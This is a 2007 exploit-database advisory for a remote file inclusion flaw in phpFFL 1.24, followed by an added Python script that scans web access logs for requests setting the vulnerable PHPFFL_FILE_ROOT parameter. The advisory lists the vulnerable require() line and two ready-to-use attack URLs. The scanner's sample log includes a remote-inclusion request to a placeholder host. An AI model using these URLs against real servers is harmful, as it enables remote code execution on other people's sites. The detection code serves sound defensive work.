phpFFL 1.24 - 'PHPFFL_FILE_ROOT' Remote File Inclusion
Author: Dj7xpl
type: webapps
platform: php
port:
date_added: 2007-09-13
date_updated: 2016-10-12
verified: 1
codes: OSVDB-37086;CVE-2007-4934;OSVDB-37085
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comphpffl_1_24.tar.gz
*******************************************************************************
# Title : phpFFL 1.24 Remote File Inclusion Vulnerability
# Author : Dj7xpl
# Contact : Dj7xpl@r00t.ir
# Download : http://sourceforge.net/project/showfiles.php?group_id=137531
# Gr33tZ : Y! Underground Group , Ir_R57 , Mehrdad AliZade
*******************************************************************************
Vuln Code:
require($PHPFFL_FILE_ROOT."program_files/livedraft/sajax.php");
[[Remote]]
http://[target]/[path]/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=[ Evil Code ]
http://[target]/[path]/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=[ Evil Code ]
"""""""""""""""""""""
# milw0rm.com [2007-09-14]
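
Added example, not part of the original advisory: a log check that finds requests setting PHPFFL_FILE_ROOT in the query string, as in the two URLs above. The combined access-log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Names taken from the advisory: the injectable variable and the two scripts.
PARAM = "PHPFFL_FILE_ROOT"
SCRIPTS = ("/livedraft/livedraft.php", "/livedraft/admin.php")

# Assumption: "combined" access-log format, request line inside double quotes.
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# A value that starts with scheme:// points the require() at a remote location.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)


def classify(log_line):
    """Return None for a clean line, else (verdict, hits_listed_script)."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    # parse_qsl percent-decodes names and values, so encoded forms still match.
    pairs = parse_qsl(url.query, keep_blank_values=True)
    # "PHPFFL_FILE_ROOT[]=x" addresses the same variable: drop any array suffix.
    values = [v for k, v in pairs if k.split("[", 1)[0] == PARAM]
    if not values:
        return None
    # The variable is internal to phpFFL, so any client-supplied value is a finding.
    remote = any(SCHEME_RE.match(v.strip()) for v in values)
    return ("remote-url" if remote else "param-set",
            url.path.lower().endswith(SCRIPTS))


def scan(lines):
    """Return (line_number, verdict, hits_listed_script) for each finding."""
    found = ((n, classify(line)) for n, line in enumerate(lines, start=1))
    return [(n, *result) for n, result in found if result]


# Constructed sample lines: documentation addresses and placeholder hosts.
BASE = "/phpffl/phpffl_webfiles/program_files/livedraft/"
SAMPLE_LOG = [
    f'192.0.2.10 - - [14/Sep/2007:10:00:01 +0000] "GET {BASE}livedraft.php HTTP/1.1" 200 5120',
    f'192.0.2.66 - - [14/Sep/2007:10:02:13 +0000] "GET {BASE}livedraft.php?PHPFFL_FILE_ROOT=http%3A%2F%2Fhost.example%2Ffile HTTP/1.1" 200 311',
    f'192.0.2.66 - - [14/Sep/2007:10:02:19 +0000] "GET {BASE}admin.php?PHPFFL%5FFILE%5FROOT=..%2F HTTP/1.1" 200 0',
    '192.0.2.23 - - [14/Sep/2007:10:05:40 +0000] "GET /search?q=PHPFFL_FILE_ROOT HTTP/1.1" 200 870',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Only the query string is inspected; values sent in a request body do not appear in a standard access log and need a WAF or application-level log to be seen.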